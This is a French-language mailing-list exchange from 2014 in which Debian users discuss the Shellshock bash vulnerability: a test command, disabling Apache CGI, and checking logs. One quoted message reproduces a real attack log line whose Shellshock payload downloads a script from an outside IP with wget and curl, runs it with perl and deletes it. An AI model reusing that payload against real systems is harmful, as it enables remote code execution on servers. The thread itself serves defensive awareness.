[Linux] Nouvelle faille de sécurité majeure ?
François DREYFÜRST
francois.dreyfuerst@::1
Mar 30 Sep 08:15:53 CEST 2014
Coucou à tous
> Le 29/09/14 09:49, François DREYFÜRST a écrit :
>> Au fait, le particulier que je suis, à part suivre scrupuleusement les
>> mises à jour de ma Debian (au passage, je commence à soupçonner que la
>> présence du paquet bash parmi ceux qui étaient à mettre à jour récemment
>> n'est pas fortuite), doit-il prendre des précautions particulières ?
>
> Vérifier que les mises à jour sont faites : pour toutes les machines,
> voir si ce qui suit renvoie "This device is vulnerable"
>
> env x='() { :;}; echo This device is vulnerable' bash -c "echo
> Testing vulnerability"
Ça s'exécute en tant que root ?
>
> -> Mon mac est touché...
>
> Comme d'habitude, supprimer tout ce qui ressemble à un service inutile
> accessible de l'extérieur.
Perso, lorsque j'ai installé ma Debian, j'ai décoché les groupes de
paquets de la famille « serveur » ... c'est plutôt bon, ou bien ?
>
> Et Debian est un bon choix, puisque (si j'ai bien compris ce que je
> répète), le shell par défaut n'est PAS bash (contrairement à bien
> d'autres distros).
Au passage, comment vérifier quel shell est actif ?
>
> J'ai vu qu'il était fortement conseillé de virer les CGI sur Apache
> (a2dismod cgi). Je viens de le faire, j'ignore si ça va avoir un
> impact. Mon site perso (non critique) supporte bien.
>
> Le danger est réel : j'ai vu passer exactement ça dans mes logs apache :
> /var/log/apache2/access.log:173.45.100.18 - - [29/Sep/2014:09:27:52
> +0200] "GET /cgi-bin/hi HTTP/1.0" 403 399 "-" "() { :;}; /bin/bash -c
> \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji
> http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf
> /tmp/ji*\""
>
> (voir :
> http://www.heise.de/security/news/foren/S-Bot-download/forum-286100/msg-25871507/read/
> )
>
> -> Si vous avez un apache, vérifiez que personne n'est venu tester
> chez vous :
> grep \} /var/log/apache2/*log
>
> Si vous ne voyez rien, le pirate a peut-être juste bien nettoyé ses
> traces :-)
>
>
> > Je
>> rappelle que mon ordi est, sur un cycle de 24h, bien plus éteint (hors
>> tension) qu'actif ; en revanche, pour l'instant mon modem-routeur est
>> allumé H24, dans la mesure où la connexion est partagée avec mon père.
>
> Si les machines n'ont pas de port ouvert sur le net, je dirais que y a
> pas grand chose à craindre. Mais y a de quoi devenir parano en ce moment.
Voir ce que je disais plus haut : en principe, j'ai fermé ce qui doit
l'être, avec le pare-feu FireStarter qui tourne sur ma bécane (en aval
du routeur) ; l'autre ordi branché sur le routeur tourne en Windows ...
>
> 20 ans qu'il est là, ce bug, 20 ans ! Combien d'autres de ce calibre
> existent ??
>
>
Oui, comme tu dis, entre ça, Heartbleed et d'autres bugs éventuellement
encore à venir, il y a de quoi virer parano ET se demander si les
logiciels libres sont aussi sûrs que leurs promoteurs le disent.
J'avais découvert l'info sur le site du journal berlinois « die
Tageszeitung » http://www.taz.de , sorte d'équivalent allemand de notre
« Libé » ; dans leur article, ils disent sans détour que sur ce coup,
les logiciels libres en prennent un coup question crédibilité.
FD
Plus d'informations sur la liste de diffusion linux